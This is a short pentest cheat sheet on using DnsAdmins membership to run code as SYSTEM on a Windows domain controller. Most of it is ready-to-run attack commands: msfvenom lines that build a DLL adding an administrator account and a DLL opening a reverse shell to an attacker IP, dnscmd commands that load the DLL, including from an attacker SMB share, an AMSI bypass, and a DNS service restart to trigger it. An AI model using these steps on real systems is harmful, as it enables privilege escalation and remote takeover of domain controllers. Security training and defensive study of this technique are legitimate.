DnsAdmins

Using DnsAdmins to run commands as NT AUTHORITY\SYSTEM

DnsAdmins group members have access to DNS information on the network. The DNS service runs as NT AUTHORITY\SYSTEM. This can be used to escalate privileges on a DC or other server that is acting as the DNS server for the domain.

It is possible to use the built-in dnscmd utility to specify the path of the plugin DLL. Then load a custom DLL which will be loaded after the DNS service has restarted.

Domain Controllers and DNS

• In Active Directory environments, Domain Controllers often act as DNS servers.
• DNS servers are critical to Active Directory operation and are accessible to most domain users.
• Microsoft implemented a custom DNS management protocol over Remote Procedure Call (RPC) for managing DNS.

The combination of the DNS protocol and the custom management protocol introduces a significant attack surface on Domain Controllers.

How to exploit

Generate a malicious DLL to execute commands

# Add user to group
msfvenom -p windows/x64/exec cmd='net group "Administrators" ryan /add' -f dll -o adduser.dll

# Reverse shell
 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.153 LPORT=443 -f dll -o reverse.dll

Load the custom DLL

dnscmd.exe /config /serverlevelplugindll C:\Users\public\reverse.dll

From target run

# From evil-winrm 
Bypass-4MSI
dnscmd.exe /config /serverlevelplugindll 'C:\users\ryan\reverse.dll'

# Using smb server
impacket-smbserver share -smb2support .
dnscmd localhost /config /serverlevelplugindll \\10.10.14.153\share\reverse.dll

Finally stop and start DNS again to trigger the DLL file.

sc.exe stop dns
sc.exe start dns